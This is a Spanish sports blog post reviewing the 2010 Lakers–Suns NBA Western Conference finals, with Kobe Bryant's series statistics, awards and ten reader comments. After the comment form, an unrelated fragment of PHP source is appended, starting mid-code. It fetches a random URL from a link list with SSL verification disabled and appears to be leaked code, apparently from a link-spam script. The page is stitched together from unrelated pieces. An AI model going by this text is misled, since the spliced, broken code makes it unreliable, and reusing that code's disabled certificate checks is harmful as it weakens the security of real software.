Playoffs 2009/10: Finales de conferencia Oeste

31 de May de 2010 por TheDeerHunter

Por un momento llegamos a pensar que no íbamos a disfrutar de playoffs este año ya que el comienzo de ambas finales de conferencia conducían a la conclusión por vía rápida.

Los dos primeros partidos de la eliminatoria fueron un recital de un Kobe Bryant sorprendentemente libre en ataque. La consecuencia fueron alrededor de 125 puntos encajados por partido por la impotente defensa de Phoenix. Demasiado bueno tenía que ser su ataque para llegar a superarlo. El nivel alcanzado por el propio Kobe, por Gasol, Odom o Fisher invitaban a la directa rendición. Nada más lejos de la realidad.

Durante los dos siguientes en Phoenix, apareció una circunstancia que se convirtiría en el eje de toda la eliminatoria. No sabemos qué es lo que nos soprendió más, si la modesta zona 2-3 de Gentry calificada por los medios como casi pueril por básica o los problemas del triángulo ofensivo de Jackson para atacarla. Casi 20 puntos de diferencia con respecto a los dos primeros partidos pero negada en todo momento por Phil como factor determinante.

Y en esto, si la suerte mide a los campeones diremos que los Lakers tienen muchas papeletas. Calcado a la primera ronda la serie casi se decidió en una jugada afortunada. Un inverosímil rebote ofensivo cazado en esta ocasión por Ron Artest en ultimísima instancia. Hay que señalar que el bueno de Ron Ron, con altibajos, ha terminado cuajando una gran serie, al igual que Odom o Fisher. Un quinteto, no lo olvidemos, que ha promediado dobles figuras en esta final y coronado por un Kobe Bryant que es capaz de redefinir el término de “determinante” como así pudo constatar Gentry en el último partido, para rendirse a la evidencia.

Los Suns quedan eliminados, pero con la cabeza alta y el trabajo bien hecho. No hubiera debido sorprender que alcanzaran la final.

PREMIOS

MVP: Kobe Bryant en una serie que no podría envidiar la de nadie. El “sucesor” de Su Majestad ha promediado 33.7 puntos por partido, 7.2 rebotes, 8.3 asistencias, 1.17 tapones y 0.83 robos de balón. Un 52% en tiros de campo, 43% en triples y un 88% en tiros libres. MI-TI-CO.

La sorpresa: Serie muy digna tanto de Artest, como de Odom y Fisher. A este nivel de los tres, con el habitual de Gasol y Kobe nadie podría contestarles sin necesidad de mencionar siquiera a Bynum. Contra los Celtics, no obstante, no será tan fácil brillar.

La decepción: Otra oportunidad perdida para Steve Nash. Todo es opinable, pero creo que le sobra un MVP y le falta un anillo merecidísimo.

El mayor esfuerzo en vano: Diría que una relación de mayor esfuerzo defensivo, que han invertido Richardson, Hill, Dudley o Barbosa sobre Kobe para tan mínimo resultado es literalmente imposible. Individualmente me quedo con el esfuerzo en vano otra vez de Nash para llevar a su equipo al Eden.

Comenta

10 comentarios a esta entrada

  1. Queco dice:
    #1

    Sólo quería recalcar esto:

    “33.7 puntos por partido, 7.2 rebotes, 8.3 asistencias, 1.17 tapones y 0.83 robos de balón. Un 52% en tiros de campo, 43% en triples y un 88% en tiros libres”

    Increíble Kobe.

      Citar

  2. Toni dice:
    #2

    APOSTUFLAN, UNBELIEVABLE… ponedle los adjetivos que querais pero se quedaran cortos. Todo eso sin contar los momentos que ha tirado del equipo él solo.
    Veremos como se plantea la final si estos dos últimos partidos de la final de conferencia han sido solo un bache en el camino de Pau o si por contra son el principio de una debacle física previsible, ojalá descanse y deje a este maltrecho Garnett en menos de una sombra de lo que era.
    La clave estará en la defensa de Artest sobre Pierce y sobre todo no dejar que se enchufe demasiado con sus numeritos, yo sigo pensando que a pesar de la falta de madurez de aquellos Lakers y que era el momento de aquel Big-Three, si hace dos años la escena de la rodilla de Pierce con su estelar vuelta no hubiera sucedido…

      Citar

  3. Txusma dice:
    #3

    Ese Robirosa…

    En nuestras listas de los mejores de la historia Kobe aparecía el tercero en los escoltas y el vigésimo en el total. Q queréis q os diga, si se lleva otro anillo como mínimo en la lista general para mí debería avanzar unas cuantas posiciones…

    Y si Gasol se lleva su segundo anillo, superará a Nowitzki?

      Citar

  4. Viva_Dirk dice:
    #4

    En anillos pasará de superarlo en uno a superarlo en 2.

    En cuanto a Kobe, yo esperaría a que termine su carrera para situarlo.

      Citar

  5. Txusma dice:
    #5

    Siempre al quite, Viva. Como siempre 😉

      Citar

  6. PIRATA dice:
    #6

    Sabeis si dan las finales por Quatro????

      Citar

  7. MagicJohnson32 dice:
    #7

    No, las Finales las dan exclusivamente por D+.

    Saludos.

      Citar

  8. PIRATA dice:
    #8

    Hola, que hi ha algu????

      Citar

  9. PIRATA dice:
    #9

    ok

      Citar

  10. MagicJohnson32 dice:
    #10

    Estábamos muy ocupados preparando la previa de las Finales, jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>